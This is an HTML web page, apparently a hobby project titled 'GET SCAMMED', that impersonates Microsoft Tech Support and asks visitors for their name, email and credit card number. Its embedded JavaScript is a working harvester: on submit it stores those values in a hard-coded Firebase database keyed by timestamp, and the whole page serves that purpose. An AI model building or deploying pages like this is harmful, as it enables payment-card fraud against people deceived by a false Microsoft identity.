<!DOCTYPE html>
<head>
<link href="https://fonts.googleapis.com/css2?family=Geostar&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Edu+AU+VIC+WA+NT+Hand:wght@400..700&display=swap" rel="stylesheet">

  <title>GET SCAMMED</title>
  <style>
    body {
      text-align: center;
        background: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTYXz3G8lvBPhyCeKUTpsHAK4I-GcCtX68i7Q&s");
      background-size: cover;
      background-position: center;
      color: white;
      font-family: "Edu AU VIC WA NT Hand";
    }
    p {
      color: blue;
      font-size: 22px;
      font-family: 'Geostar'
    }
    h1 {
      color: red;
      
    }
    input  {
      border: 0;
      color: red;
      padding: 10px;
      font-size: 18px;
    }
   button {
      background: green;
      color: red;
      padding: 11;
    }
    
 

  </style>
</head>
<body>
  <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcREQGhPky_GU1TFDo5iDW_1CekB74EYOUg7Xg&s">
  <h1>Microsoft Tech Support
  <p>Hi! Im your local microsoft tech support please input your credit card info.</p>
    <input id="Name" placeholder="Your Name">
  <input id="Email" placeholder="Your Email">
  <input id="CCN" placeholder="Credit card #">
  <input id="submit" type="submit">
 
  <script type="module">
  // Import the functions you need from the SDKs you need
  import { initializeApp } from "https://www.gstatic.com/firebasejs/11.0.2/firebase-app.js";
  import { getDatabase, ref, set } from "https://www.gstatic.com/firebasejs/11.0.2/firebase-database.js";
  // TODO: Add SDKs for Firebase products that you want to use
  // https://firebase.google.com/docs/web/setup#available-libraries

  // Your web app's Firebase configuration
  const firebaseConfig = {
    apiKey: "AIzaSyDc5NVtxRId190ysxr3MkY4EV6FHgiSBxI",
    authDomain: "pablojava-ef9ed.firebaseapp.com",
    projectId: "pablojava-ef9ed",
    storageBucket: "pablojava-ef9ed.firebasestorage.app",
    messagingSenderId: "463985210548",
    appId: "1:463985210548:web:9c102f5c13f0662c2513e1"
  };

  // Initialize Firebase
  const app = initializeApp(firebaseConfig);
  const db = getDatabase(app);
  const Name = document.querySelector("#Name") 
  const Email = document.querySelector("#Email")
	const CCN = document.querySelector("#CCN")
  document.querySelector('#submit').addEventListener('click', Submit)
  function Submit() {
  	  const timestamp = buildTimestamp()
	  
  	  set(ref(db, timestamp), {
  		  Name: Name.value,
  	    email: Email.value,
				CCN: CCN.value
  	  });

  	  Name.value = ""
  	  Email.value = ""
			CCN.value = ""
  	}
	
	
	function buildTimestamp() {
		  const now = new Date();
		  let timestamp = now.getFullYear().toString() + "/";
		  //const month = now.toLocaleString('default', { month: 'long' });

		  let month = now.getMonth()+1   //add 1 because Javascript uses 0 for January
		  month = month.toString()
		  month = addLeadingZero(month)
		  timestamp += month + "/"; 

		  let date = now.getDate().toString()
		  date = addLeadingZero(date)
		  timestamp += date + "/";

		  let hours = now.getHours().toString()
		  hours = addLeadingZero(hours)
		  timestamp += hours + ":";

		  let minutes = now.getMinutes().toString()
		  minutes = addLeadingZero(minutes)
		  timestamp += minutes + ":";

		  let seconds = now.getSeconds().toString()
		  seconds = addLeadingZero(seconds)
		  timestamp += seconds;
  
		  return timestamp
		}
	
		function addLeadingZero(units) {
			if (units.length < 2) {
				units = "0" + units
			}
			return units
		}
	         

  
</script>



</body>
